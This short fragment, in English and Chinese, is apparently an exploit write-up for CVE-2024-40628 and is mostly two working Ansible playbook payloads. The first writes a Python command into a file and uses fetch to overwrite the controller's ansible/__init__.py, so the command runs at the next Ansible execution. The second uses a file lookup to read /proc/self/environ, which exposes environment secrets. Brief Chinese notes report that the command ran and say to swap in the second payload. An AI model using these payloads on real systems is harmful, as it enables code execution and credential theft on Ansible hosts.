- hosts: all tasks: - name: create python file on remote host that executes a command shell: | echo 'from ansible.release import __version__, __author__ __import__("os").system("id > /tmp/pwnd")' > /tmp/rce - name: write that file at a known location that gets reloaded at the next ansible execution fetch: src: /tmp/rce dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py flat: true
运行作业
成功执行命令
CVE-2024-40628
将活动空间的payload更换为下面这样就行
1 2 3 4 5
- hosts: all tasks: - name: read file from local host = celery using file lookup plugin ansible.builtin.debug: msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"